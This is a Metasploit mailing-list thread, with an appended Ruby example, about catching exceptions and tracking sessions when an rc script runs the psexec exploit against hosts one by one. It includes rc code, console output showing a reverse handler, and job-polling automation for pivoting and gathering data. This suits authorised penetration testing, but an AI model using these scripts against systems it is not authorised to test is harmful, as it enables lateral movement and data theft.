Metasploit mailing list archives

Re: Catching exploit exceptions in rc script


From: Joshua Smith <lazydj98 () gmail com>
Date: Tue, 26 Jun 2012 12:54:03 -0500

birchfresh and I were emailing directly; I thought I would send this to the list.
This works:

<ruby>
        run_single("use exploit/windows/smb/psexec")
        run_single("set RHOST 1.1.1.1") # <-- this host doesn't exist
        begin
                run_single("exploit -j")
        rescue
        end
</ruby>

[*] resource (/msf/test.rc)> Ruby Code (126 bytes)
RHOST => 1.1.1.1
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.100.101:4444 
[*] Connecting to the server...

<a while later>
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (1.1.1.1:445).
URule exploit(psexec) > jobs

Jobs
====

No active jobs.

URule exploit(psexec) >

Something else to keep in mind: inside a ruby block (in an rc file) you're in a weird place in the framework (Msf::Ui::Console::Driver).
cat test.rc
<ruby>
        puts self.class
</ruby>
resource test.rc
[*] Processing /msf/test.rc for ERB directives.
[*] resource (/msf/test.rc)> Ruby Code (17 bytes)
Msf::Ui::Console::Driver

-kernelsmith

On Jun 26, 2012, at 10:46 AM, birchfresh wrote:

Hello there.

I'm using msfconsole (newest git) to run a rc script that's essentially
something like:

 <ruby>
 run_single("use windows/smb/psexec")
 # [...]

 old_sessions = framework.sessions.keys.clone
 run_single("exploit -z") rescue nil    # script stops here after exception!

 # sessions present now that were not present before the exploit ran
 new_session = (framework.sessions.keys - old_sessions).first
 do_something_with(new_session) if new_session
 </ruby>

My problem is that if the exploit raises an exception, the script refuses to
continue until I press ^C. Shouldn't "rescue nil" catch the exception?

I tried to work around it by running the exploit as a background job
(exploit -z -j) and waiting for framework.jobs.length to be decremented,
but it's no good: If there's an exception, the job hangs around forever.

For context, I'm doing the following to a number of hosts, one by one:
Pivoted login with the psexec module, run a post module to gather some
data, kill the session, move on to the next host.

Is there a better way to open a session (and get its number) than to
run_single("exploit -z") and poke around in framework.sessions.keys for
newcomers?

Or, as a last resort: Is there a way to tell if the exploit at
framework.jobs[id] is dead?
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
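An added example (not code from either message in this thread) of the job-polling approach birchfresh asked about, written as plain Ruby so it runs outside msfconsole: FakeFramework, the run_single lambda and the clock parameter are constructed stand-ins for framework.jobs, framework.sessions and the console driver's run_single, and it assumes, as the thread does, that jobs and sessions are Hash-like keyed by id.

```ruby
# Constructed stand-in for msfconsole's `framework` object: in Metasploit,
# framework.jobs and framework.sessions are Hash-like, keyed by job/session id.
FakeFramework = Struct.new(:jobs, :sessions)

# Run one exploit through +run_single+ as a background job ("exploit -j"),
# wait for the job to finish (success or failure) with a deadline instead of
# blocking on "exploit -z", then report any session that appeared.
# Returns [:session, id], [:no_session, nil], [:timeout, nil] or [:error, msg].
def exploit_and_collect(framework, run_single, timeout: 30.0, interval: 0.1,
                        clock: -> { Time.now.to_f })
  jobs_before     = framework.jobs.keys
  sessions_before = framework.sessions.keys
  begin
    run_single.call("exploit -j")   # in an rc file: run_single("exploit -z -j")
  rescue StandardError => e         # a bare `rescue` also only catches StandardError
    return [:error, e.message]
  end
  # The job the exploit command just started, found by diffing job ids.
  new_job  = (framework.jobs.keys - jobs_before).first
  deadline = clock.call + timeout
  while new_job && framework.jobs.key?(new_job)
    # Job still present: the exploit is running or, as in the thread, hung.
    return [:timeout, nil] if clock.call > deadline
    sleep interval
  end
  # New sessions are (after - before); the other order yields removed ones.
  new_session = (framework.sessions.keys - sessions_before).first
  new_session ? [:session, new_session] : [:no_session, nil]
end
```

Inside a `<ruby>` block under msfconsole, `framework` is the real object and `method(:run_single)` can be passed as the second argument.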